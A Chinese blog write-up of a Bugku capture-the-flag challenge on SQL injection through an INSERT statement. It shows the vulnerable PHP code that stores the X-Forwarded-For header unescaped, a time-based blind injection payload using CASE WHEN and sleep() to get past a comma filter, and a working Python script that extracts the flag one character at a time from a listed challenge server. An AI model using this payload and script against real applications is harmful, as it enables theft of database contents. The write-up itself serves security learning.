bugku insert into 注入

题目源码:

  

flag格式:flag{xxxxxxxxxxxx}
不如写个Python吧

error_reporting(0);

function getIp(){
$ip = '';
if(isset($_SERVER['HTTP_X_FORWARDED_FOR'])){
$ip = $_SERVER['HTTP_X_FORWARDED_FOR'];
}else{
$ip = $_SERVER['REMOTE_ADDR'];
}
$ip_arr = explode(',', $ip);
return $ip_arr[0];

}

$host="localhost";
$user="";
$pass="";
$db="";

$connect = mysql_connect($host, $user, $pass) or die("Unable to connect");

mysql_select_db($db) or die("Unable to select database");

$ip = getIp();
echo 'your ip is :'.$ip;
$sql="insert into client_ip (ip) values ('$ip')";
mysql_query($sql);

 

 

 

XFF因为只有Insert没有输出所以使用延迟注入,逗号过滤 ,无法使用If,所以使用:

select case when xxx then xxx else xxx end;

 

 

POCURL=

"127.0.0.1'+(select case when substr((select flag from flag) from {0} for 1)='{1}' then sleep(5) else 0 end))#"

( {0} {1} 标注点为循环点,使用format()函数进行替换。)

 

import requests
import sys
#python3.6

url='http://123.206.87.240:8002/web15/'

sql="127.0.0.1'+(select case when substr((select flag from flag) from {0} for 1)='{1}' then sleep(5) else 0 end))#"

flag=''

#strtest="TEST{0}+{1}"

for i in range(1,40):
    for ch in range (32,129):
        if ch ==128:
            sys.exit(0)
        xff=sql.format(i,chr(ch))
        #print(xff)
        headers={
            'X-Forwarded-For':xff
        }
        print('这是第'+str(i)+'轮,'+''+str(ch)+'次进行猜测')

        try:
            re = requests.get(url,headers=headers,timeout=3)
        except:
            flag += chr(ch)
            print('flag:'+flag)
            break

#注:flag跑出来字母是大写,实际为小写。

#注:由于网络不好,延迟太高先使用虚拟机跑结果完全不对,后来换用本机成功。

 

参考:https://blog.csdn.net/xuchen16/article/details/82904488


posted @ 2019-09-06 19:31  Zhu013  阅读(669)  评论(0编辑  收藏  举报